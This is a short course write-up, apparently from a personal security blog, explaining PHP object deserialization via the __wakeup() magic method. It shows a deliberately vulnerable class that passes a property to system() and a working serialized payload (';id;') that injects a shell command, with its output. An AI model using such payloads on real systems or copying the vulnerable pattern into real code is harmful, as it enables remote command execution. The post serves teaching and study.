Simple Web 0x16.5(php unserialize)

Posted on 2023-02-05 | Post modified | In Security/Course/NTUST WS/Deserialization |

Simple Web 0x16.5(php unserialize)

tags: `NTUSTWS` `CTF` `Web`

Background

php magic method

Source code

class cat
{
    public $sound = 'ls';
    function __wakeup()
    {
        system("echo".$this->sound);
    }
}
$cat = unserialize($_GET['cat']);

Description & Analyze

$ php -a
php > class cat
php >  public {
php {     public $sound = 'ls';
php {     function __wakeup()
php {     {
php {         system("echo ".$this->sound);
php {     }
php { }
php > $_GET['cat']='O:3:"cat":1:{s:5:"sound";s:4:"meow";}';
php > $cat = unserialize($_GET['cat']);
meow
php > $_GET['cat']='O:3:"cat":1:{s:5:"sound";s:4:";id;";}';
php > $cat = unserialize($_GET['cat']);

uid=1000(sbk6401) gid=1000(sbk6401) groups=1000(sbk6401),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),1001(docker)

This is a typical command injection. The magic method __wakeup() will be called when unserialized something.

Reference

Post author: SBK6401
Post link: https://bernie6401.github.io/security/course/ntust%20ws/deserialization/2023/02/05/Simple-Web-0x16.5(php-unserialize)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.